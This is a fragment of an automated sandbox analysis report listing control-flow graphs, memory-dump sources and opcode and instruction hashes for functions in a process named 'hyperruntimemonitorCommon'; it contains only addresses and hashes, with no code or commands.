230->248 231->241 232->194 243 7ffd9c1c1f14 232->243 233->217 234->228 235->168 244 7ffd9c1c1d58 235->244 236->194 237->211 245 7ffd9c1c1e6d-7ffd9c1c1e6f 237->245 239->191 241->203 242->193 243->214 244->172 245->231 247 7ffd9c1c1e71 245->247 247->248 250 7ffd9c1c1e73 247->250 248->178 248->186 250->185
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57cedc8dd42b250684c9d3601b5465854b21c36e0e1bc186af7fb706a9573858
                                                            • Instruction ID: 52f0003ca3d99a3237e783600d0eff92a1bf4e6003465cc212393115b57f3738
                                                            • Opcode Fuzzy Hash: 57cedc8dd42b250684c9d3601b5465854b21c36e0e1bc186af7fb706a9573858
                                                            • Instruction Fuzzy Hash: AC329731B58A1A8FDB6CEB58C865AB873F1FF54350B6041B9E00ED7292DE24EC45CB85

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 251 7ffd9c1cd7d5-7ffd9c1cd810 254 7ffd9c1cd829-7ffd9c1cd83b 251->254 255 7ffd9c1cd812-7ffd9c1cd81f 251->255 258 7ffd9c1cd83d-7ffd9c1cd869 254->258 259 7ffd9c1cd86e-7ffd9c1cd891 254->259 255->254 260 7ffd9c1cd821-7ffd9c1cd827 255->260 269 7ffd9c1cdc1c-7ffd9c1cdc27 258->269 267 7ffd9c1cd8f6-7ffd9c1cd908 259->267 268 7ffd9c1cd893-7ffd9c1cd8ab 259->268 260->254 274 7ffd9c1cda38-7ffd9c1cda4a 267->274 275 7ffd9c1cd90e-7ffd9c1cd933 267->275 272 7ffd9c1cd8c7-7ffd9c1cd8d8 268->272 273 7ffd9c1cd8ad-7ffd9c1cd8c5 268->273 279 7ffd9c1cd8da-7ffd9c1cd8ef 272->279 280 7ffd9c1cd8f1 272->280 273->272 283 7ffd9c1cdc0a-7ffd9c1cdc1a 274->283 284 7ffd9c1cda50-7ffd9c1cda66 274->284 275->274 288 7ffd9c1cd939-7ffd9c1cd94d 275->288 279->280 280->269 283->269 284->283 297 7ffd9c1cda6c-7ffd9c1cda80 284->297 292 7ffd9c1cdc28-7ffd9c1cdc88 288->292 293 7ffd9c1cd953-7ffd9c1cd95d 288->293 303 7ffd9c1cdcc9-7ffd9c1cdd13 292->303 304 7ffd9c1cdc8a-7ffd9c1cdcb1 call 7ffd9c1cbe20 292->304 295 7ffd9c1cd976-7ffd9c1cd9d3 293->295 296 7ffd9c1cd95f-7ffd9c1cd974 293->296 295->274 324 7ffd9c1cd9d5-7ffd9c1cd9ed 295->324 296->295 297->283 310 7ffd9c1cdd5c-7ffd9c1cdd6a call 7ffd9c1cc760 303->310 311 7ffd9c1cdd15-7ffd9c1cdd5b 303->311 304->303 316 7ffd9c1cdca3-7ffd9c1cdca8 304->316 325 7ffd9c1cdd6c-7ffd9c1cdd83 310->325 311->310 327 7ffd9c1cda09-7ffd9c1cda1a 324->327 328 7ffd9c1cd9ef-7ffd9c1cda07 324->328 329 7ffd9c1cdd89-7ffd9c1cdd8d 325->329 335 7ffd9c1cda1c-7ffd9c1cda31 327->335 336 7ffd9c1cda33 327->336 328->327 335->336 336->269
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a354ad1faf4e70aa898e30a7642be46e6d69806a706eec9f707a411d7663d32a
                                                            • Instruction ID: 3d5e3e16eaffa0a647b047a5b40ef7b3068eb285efb860a6ea242a3ceaf6b285
                                                            • Opcode Fuzzy Hash: a354ad1faf4e70aa898e30a7642be46e6d69806a706eec9f707a411d7663d32a
                                                            • Instruction Fuzzy Hash: BBE1F622B4DA4B4FE7A5FB68846467877F1EF99350B4901BBE00DD72E2DE28AC05C345

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 339 7ffd9c1c3c7f-7ffd9c1c3c92 340 7ffd9c1c3cde-7ffd9c1c3cf4 339->340 341 7ffd9c1c3c94-7ffd9c1c3fd5 339->341 343 7ffd9c1c3cfa-7ffd9c1c3d02 340->343 344 7ffd9c1c3d84-7ffd9c1c3db4 340->344 347 7ffd9c1c3fdf-7ffd9c1c401e 341->347 346 7ffd9c1c3d08-7ffd9c1c3d1a 343->346 343->347 354 7ffd9c1c3dba-7ffd9c1c3dbb 344->354 355 7ffd9c1c3e5e-7ffd9c1c3e67 344->355 346->347 348 7ffd9c1c3d20-7ffd9c1c3d37 346->348 360 7ffd9c1c4020 347->360 349 7ffd9c1c3d77-7ffd9c1c3d7e 348->349 350 7ffd9c1c3d39-7ffd9c1c3d40 348->350 349->343 349->344 350->347 353 7ffd9c1c3d46-7ffd9c1c3d74 350->353 353->349 359 7ffd9c1c3dbe-7ffd9c1c3dd4 354->359 357 7ffd9c1c3f9f-7ffd9c1c3fad 355->357 358 7ffd9c1c3e6d-7ffd9c1c3e73 355->358 361 7ffd9c1c3faf 357->361 362 7ffd9c1c3fb4-7ffd9c1c3fc5 357->362 358->347 363 7ffd9c1c3e79-7ffd9c1c3e88 358->363 359->347 364 7ffd9c1c3dda-7ffd9c1c3dfe 359->364 369 7ffd9c1c402b-7ffd9c1c40c1 360->369 361->362 365 7ffd9c1c3e8e-7ffd9c1c3e95 363->365 366 7ffd9c1c3f92-7ffd9c1c3f99 363->366 367 7ffd9c1c3e00-7ffd9c1c3e23 364->367 368 7ffd9c1c3e51-7ffd9c1c3e58 364->368 365->347 370 7ffd9c1c3e9b-7ffd9c1c3ea5 365->370 366->357 366->358 367->347 375 7ffd9c1c3e29-7ffd9c1c3e4f 367->375 368->355 368->359 376 7ffd9c1c4046-7ffd9c1c40c6 369->376 377 7ffd9c1c40cc-7ffd9c1c4595 369->377 374 7ffd9c1c3eac-7ffd9c1c3eb7 370->374 378 7ffd9c1c3ef6-7ffd9c1c3f05 374->378 379 7ffd9c1c3eb9-7ffd9c1c3ed0 374->379 375->367 375->368 376->377 385 7ffd9c1c4068-7ffd9c1c40c8 376->385 378->347 383 7ffd9c1c3f0b-7ffd9c1c3f2f 378->383 379->347 381 7ffd9c1c3ed6-7ffd9c1c3ef2 379->381 381->379 386 7ffd9c1c3ef4 381->386 387 7ffd9c1c3f32-7ffd9c1c3f4f 383->387 385->377 395 7ffd9c1c408c-7ffd9c1c40ca 385->395 390 7ffd9c1c3f72-7ffd9c1c3f88 386->390 387->347 391 7ffd9c1c3f55-7ffd9c1c3f70 387->391 390->347 394 7ffd9c1c3f8a-7ffd9c1c3f8e 390->394 391->387 391->390 394->366 395->377 401 7ffd9c1c40ad-7ffd9c1c40c0 395->401
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d70780d1746bd746d99ea2bd0588904d2b02451d632d8b5c67c6f68f688b6d3f
                                                            • Instruction ID: 1b18d9901fcbf3b4b5452e3f38732ef15722a29dcb5b66def9dc2603f6aff79e
                                                            • Opcode Fuzzy Hash: d70780d1746bd746d99ea2bd0588904d2b02451d632d8b5c67c6f68f688b6d3f
                                                            • Instruction Fuzzy Hash: EEF1D4316586468FEB68DF58C0E56F437B1FF48310B5445BDE84A8B68BCA38F881CB45

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 403 7ffd9c1c4cc1 404 7ffd9c1c4cc6-7ffd9c1c4cce 403->404 405 7ffd9c1c4cd4-7ffd9c1c4ce6 call 7ffd9c1c4690 404->405 406 7ffd9c1c4e51-7ffd9c1c4e65 404->406 411 7ffd9c1c4ce8-7ffd9c1c4ced 405->411 412 7ffd9c1c4cb5-7ffd9c1c4cbc 405->412 408 7ffd9c1c4e67 406->408 409 7ffd9c1c4e6c-7ffd9c1c4e77 406->409 408->409 413 7ffd9c1c4d0f-7ffd9c1c4d20 411->413 414 7ffd9c1c4cef-7ffd9c1c4cf3 411->414 415 7ffd9c1c4e90-7ffd9c1c4e95 412->415 418 7ffd9c1c4d26-7ffd9c1c4d3b 413->418 419 7ffd9c1c4e9a-7ffd9c1c4eb5 413->419 416 7ffd9c1c4cf9-7ffd9c1c4d0a 414->416 417 7ffd9c1c4df3-7ffd9c1c4e04 414->417 415->403 416->406 421 7ffd9c1c4e06 417->421 422 7ffd9c1c4e0b-7ffd9c1c4e16 417->422 418->419 420 7ffd9c1c4d41-7ffd9c1c4d4d 418->420 427 7ffd9c1c4eb7 419->427 428 7ffd9c1c4ebd 419->428 424 7ffd9c1c4d4f-7ffd9c1c4d66 call 7ffd9c1c31a0 420->424 425 7ffd9c1c4d7e-7ffd9c1c4d94 call 7ffd9c1c4690 420->425 421->422 424->417 436 7ffd9c1c4d6c-7ffd9c1c4d7b call 7ffd9c1c32d0 424->436 425->417 434 7ffd9c1c4d96-7ffd9c1c4da1 425->434 427->428 431 7ffd9c1c4ebf 428->431 432 7ffd9c1c4ec1-7ffd9c1c4f23 428->432 431->432 435 7ffd9c1c4f01-7ffd9c1c4f03 431->435 453 7ffd9c1c4eeb-7ffd9c1c4f27 432->453 454 7ffd9c1c4f2e-7ffd9c1c4f4c 432->454 434->419 439 7ffd9c1c4da7-7ffd9c1c4dbc 434->439 440 7ffd9c1c4f05-7ffd9c1c4f20 435->440 441 7ffd9c1c4f4e-7ffd9c1c4f80 435->441 436->425 439->419 444 7ffd9c1c4dc2-7ffd9c1c4dd5 439->444 456 7ffd9c1c5068-7ffd9c1c506d 441->456 448 7ffd9c1c4dd7-7ffd9c1c4df1 call 7ffd9c1c31a0 444->448 449 7ffd9c1c4e29-7ffd9c1c4e31 444->449 448->417 461 7ffd9c1c4e17-7ffd9c1c4e26 call 7ffd9c1c32d0 448->461 455 7ffd9c1c4e39-7ffd9c1c4e3c 449->455 453->435 459 7ffd9c1c4e43-7ffd9c1c4e4b 455->459 473 7ffd9c1c4f9c-7ffd9c1c5077 456->473 474 7ffd9c1c5081-7ffd9c1c509f 456->474 459->406 463 7ffd9c1c4c8a-7ffd9c1c4c97 459->463 461->449 463->459 467 7ffd9c1c4c9d-7ffd9c1c4cb1 463->467 467->459 483 7ffd9c1c4fc6-7ffd9c1c4fc9 473->483 484 7ffd9c1c504d-7ffd9c1c5065 473->484 483->484 486 7ffd9c1c4fcf-7ffd9c1c4fd2 483->486 484->456 487 7ffd9c1c503b-7ffd9c1c5042 486->487 488 7ffd9c1c4fd4-7ffd9c1c5001 486->488 489 7ffd9c1c5044-7ffd9c1c504c 487->489 490 7ffd9c1c5002-7ffd9c1c501c 487->490 491 7ffd9c1c5022-7ffd9c1c502d 490->491 492 7ffd9c1c50a1-7ffd9c1c50f1 call 7ffd9c1c18e0 490->492 491->492 494 7ffd9c1c502f-7ffd9c1c5039 491->494 494->487
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67debf4fb825b6e3ff4da6a362c396fc806aacd5faaff5afa4007f9e825c864f
                                                            • Instruction ID: 4579f6adb1bdf6e24ef24fad3885b6aeae093066d13cd3cf3a66674b0c3c0163
                                                            • Opcode Fuzzy Hash: 67debf4fb825b6e3ff4da6a362c396fc806aacd5faaff5afa4007f9e825c864f
                                                            • Instruction Fuzzy Hash: 23D1F232B4CB474FE379EB68D0A15B577F1FF54340B1045BEE48AC3682DA29B8428799

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cf7023b21d81678feb062c76c7254dd63e980636c35d5b4e2332618df9200ea
                                                            • Instruction ID: ef52583215f2d312151dd04156c572ef8c06da20bfb77d584807e8c18751a1dd
                                                            • Opcode Fuzzy Hash: 5cf7023b21d81678feb062c76c7254dd63e980636c35d5b4e2332618df9200ea
                                                            • Instruction Fuzzy Hash: 1B414923F8C65386F7387AF864714F867609F157A9B280AB6F48E9A1D7CD1D384093C9

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 549 7ffd9c1c3c9f-7ffd9c1c3ca8 550 7ffd9c1c3fdf-7ffd9c1c4020 549->550 551 7ffd9c1c3cae-7ffd9c1c3cbf 549->551 569 7ffd9c1c402b-7ffd9c1c40c1 550->569 552 7ffd9c1c3cd5-7ffd9c1c3cdc 551->552 553 7ffd9c1c3cc1-7ffd9c1c3cc5 551->553 555 7ffd9c1c3cde-7ffd9c1c3cf4 552->555 556 7ffd9c1c3c94-7ffd9c1c3fd5 552->556 553->550 554 7ffd9c1c3ccb-7ffd9c1c3cd3 553->554 554->552 560 7ffd9c1c3cfa-7ffd9c1c3d02 555->560 561 7ffd9c1c3d84-7ffd9c1c3db4 555->561 556->550 560->550 564 7ffd9c1c3d08-7ffd9c1c3d1a 560->564 571 7ffd9c1c3dba-7ffd9c1c3dbb 561->571 572 7ffd9c1c3e5e-7ffd9c1c3e67 561->572 564->550 565 7ffd9c1c3d20-7ffd9c1c3d37 564->565 566 7ffd9c1c3d77-7ffd9c1c3d7e 565->566 567 7ffd9c1c3d39-7ffd9c1c3d40 565->567 566->560 566->561 567->550 570 7ffd9c1c3d46-7ffd9c1c3d74 567->570 582 7ffd9c1c4046-7ffd9c1c40c6 569->582 583 7ffd9c1c40cc-7ffd9c1c4595 569->583 570->566 577 7ffd9c1c3dbe-7ffd9c1c3dd4 571->577 574 7ffd9c1c3f9f-7ffd9c1c3fad 572->574 575 7ffd9c1c3e6d-7ffd9c1c3e73 572->575 578 7ffd9c1c3faf 574->578 579 7ffd9c1c3fb4-7ffd9c1c3fc5 574->579 575->550 580 7ffd9c1c3e79-7ffd9c1c3e88 575->580 577->550 581 7ffd9c1c3dda-7ffd9c1c3dfe 577->581 578->579 584 7ffd9c1c3e8e-7ffd9c1c3e95 580->584 585 7ffd9c1c3f92-7ffd9c1c3f99 580->585 586 7ffd9c1c3e00-7ffd9c1c3e23 581->586 587 7ffd9c1c3e51-7ffd9c1c3e58 581->587 582->583 592 7ffd9c1c4068-7ffd9c1c40c8 582->592 584->550 589 7ffd9c1c3e9b-7ffd9c1c3ea5 584->589 585->574 585->575 586->550 597 7ffd9c1c3e29-7ffd9c1c3e4f 586->597 587->572 587->577 596 7ffd9c1c3eac-7ffd9c1c3eb7 589->596 592->583 602 7ffd9c1c408c-7ffd9c1c40ca 592->602 599 7ffd9c1c3ef6-7ffd9c1c3f05 596->599 600 7ffd9c1c3eb9-7ffd9c1c3ed0 596->600 597->586 597->587 599->550 604 7ffd9c1c3f0b-7ffd9c1c3f2f 599->604 600->550 603 7ffd9c1c3ed6-7ffd9c1c3ef2 600->603 602->583 614 7ffd9c1c40ad-7ffd9c1c40c0 602->614 603->600 608 7ffd9c1c3ef4 603->608 609 7ffd9c1c3f32-7ffd9c1c3f4f 604->609 612 7ffd9c1c3f72-7ffd9c1c3f88 608->612 609->550 613 7ffd9c1c3f55-7ffd9c1c3f70 609->613 612->550 615 7ffd9c1c3f8a-7ffd9c1c3f8e 612->615 613->609 613->612 615->585
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30e71fc3b4857280386ceefcc76b69f9bdac6d4730dc32fc193e7a2f8f42aceb
                                                            • Instruction ID: 0f861a1a3b3ab8f7f55326b803fb4f2216c5be658f0d442bb98d2653ee2b5f09
                                                            • Opcode Fuzzy Hash: 30e71fc3b4857280386ceefcc76b69f9bdac6d4730dc32fc193e7a2f8f42aceb
                                                            • Instruction Fuzzy Hash: 67C1D1316586468BEB2DDF48C0E55F137B1FF49340B5445BDE84A8B68BCA38F842CB49

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d4043d7169169d76c9e833b4ae3ba58d5d7fd72077f727044e211121157dfcf
                                                            • Instruction ID: 0e2326b30965830ce3a1960055c363d4dbc8dad91fd5361cca155cdb3dccb0bc
                                                            • Opcode Fuzzy Hash: 8d4043d7169169d76c9e833b4ae3ba58d5d7fd72077f727044e211121157dfcf
                                                            • Instruction Fuzzy Hash: D5317F22E4C55B8EE779FBA894715F876B0EF583A5F1401BAE00EE61C6CD286C408789

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 617 7ffd9c1c3532-7ffd9c1c3539 618 7ffd9c1c3755-7ffd9c1c3766 617->618 619 7ffd9c1c353f-7ffd9c1c3571 call 7ffd9c1c32d0 call 7ffd9c1c31a0 617->619 621 7ffd9c1c3768 618->621 622 7ffd9c1c376d-7ffd9c1c3778 618->622 619->618 626 7ffd9c1c3577-7ffd9c1c358c call 7ffd9c1c32d0 619->626 621->622 629 7ffd9c1c358f-7ffd9c1c359d 626->629 631 7ffd9c1c359f-7ffd9c1c35c9 call 7ffd9c1c31a0 629->631 631->618 635 7ffd9c1c35cf-7ffd9c1c3614 call 7ffd9c1c32d0 631->635 641 7ffd9c1c3616-7ffd9c1c362a call 7ffd9c1c31a0 635->641 642 7ffd9c1c3684-7ffd9c1c36c0 635->642 641->618 646 7ffd9c1c3630-7ffd9c1c3653 call 7ffd9c1c32d0 641->646 651 7ffd9c1c36f9-7ffd9c1c36fe 642->651 652 7ffd9c1c3825-7ffd9c1c383c 646->652 653 7ffd9c1c3659-7ffd9c1c3669 646->653 656 7ffd9c1c3705-7ffd9c1c370a 651->656 657 7ffd9c1c383f-7ffd9c1c384d 652->657 658 7ffd9c1c383e 652->658 653->652 654 7ffd9c1c366f-7ffd9c1c3682 653->654 654->641 654->642 659 7ffd9c1c370c-7ffd9c1c370e 656->659 660 7ffd9c1c36c2-7ffd9c1c36e2 656->660 662 7ffd9c1c3855 657->662 663 7ffd9c1c384f 657->663 658->657 659->618 664 7ffd9c1c3710-7ffd9c1c3713 659->664 660->652 661 7ffd9c1c36e8-7ffd9c1c36f3 660->661 661->651 665 7ffd9c1c37db-7ffd9c1c37ef 661->665 666 7ffd9c1c3857 662->666 667 7ffd9c1c3859-7ffd9c1c3898 662->667 663->662 668 7ffd9c1c3715 664->668 669 7ffd9c1c3719-7ffd9c1c3734 664->669 672 7ffd9c1c37f6-7ffd9c1c3801 665->672 673 7ffd9c1c37f1 665->673 666->667 670 7ffd9c1c3899 666->670 667->670 675 7ffd9c1c389a-7ffd9c1c3ada 667->675 668->669 669->652 674 7ffd9c1c373a-7ffd9c1c3753 call 7ffd9c1c31a0 669->674 670->675 673->672 674->618 679 7ffd9c1c3779-7ffd9c1c3792 call 7ffd9c1c32d0 674->679 679->652 683 7ffd9c1c3798-7ffd9c1c379f 679->683 684 7ffd9c1c37c9-7ffd9c1c37d1 683->684 685 7ffd9c1c37d3-7ffd9c1c37d9 684->685 686 7ffd9c1c37a1-7ffd9c1c37bd 684->686 685->665 688 7ffd9c1c3802 685->688 686->652 687 7ffd9c1c37bf-7ffd9c1c37c7 686->687 687->684 688->652
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2778cc4584037f27ec066bb47cb4e5e2556bddfe4cae3a50705cc03bb5490bdd
                                                            • Instruction ID: 072ed5497d8d72149406e2b5a57b2c76078eb93c7d030fa47be46addaaaadaaf
                                                            • Opcode Fuzzy Hash: 2778cc4584037f27ec066bb47cb4e5e2556bddfe4cae3a50705cc03bb5490bdd
                                                            • Instruction Fuzzy Hash: ABC1E471B08A478FE759EB58C0A26E4B7B0FF59340F944179E04EC7A86DB28F851CB84

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5eba2f0d4ea6bd796c755b50ca2972ec80ed1a5a7f5ca6d311da3fb6939497f5
                                                            • Instruction ID: 8ff218998cb08d4e834857345a6e2d220859698fcdc149cbc38866c88b68e8ab
                                                            • Opcode Fuzzy Hash: 5eba2f0d4ea6bd796c755b50ca2972ec80ed1a5a7f5ca6d311da3fb6939497f5
                                                            • Instruction Fuzzy Hash: 6A91A531718A1E8FDB58EB58C8959B9B3F2FF59314B1481A9D04ED7292DA35FC82CB40
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d77c6451dc003bfbeb1203e0532de76fba75686a53a37a6964b402dcab13f90
                                                            • Instruction ID: b2e1efca8618975df8e93ffd25e33a304853eaf47ebcb1d31b7fc463e1d17876
                                                            • Opcode Fuzzy Hash: 8d77c6451dc003bfbeb1203e0532de76fba75686a53a37a6964b402dcab13f90
                                                            • Instruction Fuzzy Hash: 9421D313FCD2978AF77C76B418320F91BB05F126A4F2806BAF04DA61D7CC0C28445389
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3abb6e627148a8dc89684aa21706e97bd1de3bfab051fd150c1f8c909ee96fc
                                                            • Instruction ID: 16883d81736d38822a1e7193b729ef55d48c9bf9992ee6cedf37814067bbd623
                                                            • Opcode Fuzzy Hash: d3abb6e627148a8dc89684aa21706e97bd1de3bfab051fd150c1f8c909ee96fc
                                                            • Instruction Fuzzy Hash: 05A1CC31E09B478FE368DA64D1A057577F1FF44360B60467EC08EC7A92EA29B842CB45
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a10ccb692fec8c89f56cccc08dce5268d1baf94a61b874cf232001d20cc01f0b
                                                            • Instruction ID: 1a02cebde811407e0eabdeb4146235ccf9df5dd6a0424b6fa836ecd1cfedeedc
                                                            • Opcode Fuzzy Hash: a10ccb692fec8c89f56cccc08dce5268d1baf94a61b874cf232001d20cc01f0b
                                                            • Instruction Fuzzy Hash: 28B1B031A195568FEB68CF58C0E05B437B1FF49350BA442BDD85BCB69AD638F881CB84
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03b368a04096a9d8ca02a014b785fe282b415001339f9609c110abeb6d959c3c
                                                            • Instruction ID: 319d4bc5f406e61717d89b5f0642590133b8edf0e8a12f9a9f3d1f026117e71f
                                                            • Opcode Fuzzy Hash: 03b368a04096a9d8ca02a014b785fe282b415001339f9609c110abeb6d959c3c
                                                            • Instruction Fuzzy Hash: 80811532B4DB478FE338AA68946157977F0EF95390B15057EF08BD3283DE29B8028749
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 008d27cc2d582c64b3ce69cdb3b64a41637aeabac94f751fcc38c39aa795ccb2
                                                            • Instruction ID: a036e8a377708e96042b4ae6496bfdee468a4a892f33b6277b86f4e2edf9f79a
                                                            • Opcode Fuzzy Hash: 008d27cc2d582c64b3ce69cdb3b64a41637aeabac94f751fcc38c39aa795ccb2
                                                            • Instruction Fuzzy Hash: 16811532B8CA078FE738AAA8946557977F0EF453D0B14057EF48ED3182DE29B8428749
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fb4f7fdb1aeae1a055221f08234cbd68d2049c792ca5376caddf866756c87f4
                                                            • Instruction ID: 1dfc2f8f76634575cbbf36387b4e9d9bc95a9a1048a5a7360f4fb3667115cd39
                                                            • Opcode Fuzzy Hash: 4fb4f7fdb1aeae1a055221f08234cbd68d2049c792ca5376caddf866756c87f4
                                                            • Instruction Fuzzy Hash: EC710772B4C44B4FE778EA98887A5B537E0EF583D0B0402B9F05ED7652ED18EC068785
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d465a250337fa55bf76b52c1f58a937277be1d8ac87e671f6c361267385ef353
                                                            • Instruction ID: da7b916d220820208e288bc7a1deed7817f9d840a9f76b8f7ed9ac8be072a16e
                                                            • Opcode Fuzzy Hash: d465a250337fa55bf76b52c1f58a937277be1d8ac87e671f6c361267385ef353
                                                            • Instruction Fuzzy Hash: 9C714532A4C54B4FE778FA5888665B937E0FF48350B5002B9F49ED75B2DD18A8068789
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e11528a1135b38c5c98da053a8a4612792c416658fd672cf9c9ded637b055401
                                                            • Instruction ID: 6f4def78998b4f0877d27b9908416b2fb8b0763fedc7e572108e70ad1608e5d7
                                                            • Opcode Fuzzy Hash: e11528a1135b38c5c98da053a8a4612792c416658fd672cf9c9ded637b055401
